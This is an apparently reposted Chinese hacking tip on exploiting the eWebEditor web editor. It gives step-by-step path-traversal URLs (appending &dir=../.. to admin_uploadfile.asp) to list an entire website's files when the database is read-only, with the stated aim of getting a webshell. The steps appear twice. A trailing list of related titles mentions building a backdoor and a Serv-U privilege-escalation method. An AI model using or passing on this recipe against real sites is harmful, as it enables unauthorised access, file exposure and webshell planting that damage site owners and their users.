当Ewebeditor数据库为只读时..
来源:互联网 发布:公司架构如何搭建网络 编辑:程序博客网 时间:2024/05/09 09:17
版本的ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限. 能看不能动好在webeditor后台有个小小的缺陷. 可以历遍整个网站目录哦. 当然.数据库为只读的时候一样可以利用.
for:
上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了
当然 能不能拿到shell 具体问题具体解决..
for:
上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了
当然 能不能拿到shell 具体问题具体解决..
- 当Ewebeditor数据库为只读时..
- SqlServer附加数据库时为只读
- 附加数据库为只读
- 数据库为只读的解决方法
- 数据库为只读的解决方法
- 数据库为只读的解决方法
- SQLServer 设置数据库为只读
- 设置mysql数据库为只读
- SQLServer 设置数据库为只读
- 附加SQL Server数据库时为只读的解决办法
- SQL Server2008附加数据库之后显示为只读时解决方法
- SQL Server2008附加数据库之后显示为只读时解决方法
- SQL Server2008附加数据库之后显示为只读时解决方法
- SQL Server2008附加数据库之后显示为只读时解决方法
- SQL Server2008附加数据库之后显示为只读时解决方法
- SQL Server2008附加数据库之后显示为只读时解决方法
- SQL Server2008附加数据库之后显示为只读时解决方法
- sqlserver2005附加数据库文件为只读
- 谨慎使用 multiple inheritance(多继承)
- 调试javascript
- 让“失败教育”走开(转)
- 让我们一起回顾这段历史(转自闾丘露薇博客)
- 建造永不被杀的80端口后门
- 当Ewebeditor数据库为只读时..
- 第九部分 方法----读《Microsoft.NET框架程序设计》
- Serv-u6.0提权新招
- 其实很多女孩都不知道
- 百度优先收录自己的网站
- p-unit进入SourceForge.net 2007最佳新项目Finalist
- 基于NeHe第十九课做的粒子系统
- The first article
- Java连接数据库实例
